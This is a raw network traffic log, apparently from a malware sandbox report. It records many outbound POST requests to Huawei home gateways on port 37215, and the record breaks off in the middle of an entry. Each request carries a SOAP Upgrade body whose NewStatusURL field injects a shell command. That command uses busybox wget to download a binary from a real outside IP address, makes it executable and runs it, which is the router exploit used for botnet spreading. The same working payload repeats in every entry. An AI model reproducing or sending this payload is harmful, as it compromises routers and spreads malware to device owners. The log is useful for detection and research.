                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            491192.168.2.153687241.230.247.8337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786811113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            492192.168.2.154452441.237.241.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786855936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            493192.168.2.155808641.106.210.20037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786858082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            494192.168.2.155412641.127.54.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786895037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            495192.168.2.153390441.135.233.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.786976099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            496192.168.2.154875041.57.164.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787000895 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            497192.168.2.154512641.184.121.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787025928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            498192.168.2.155137441.169.124.21537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787046909 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            499192.168.2.154611841.245.138.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787085056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            500192.168.2.154431841.95.38.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787096024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
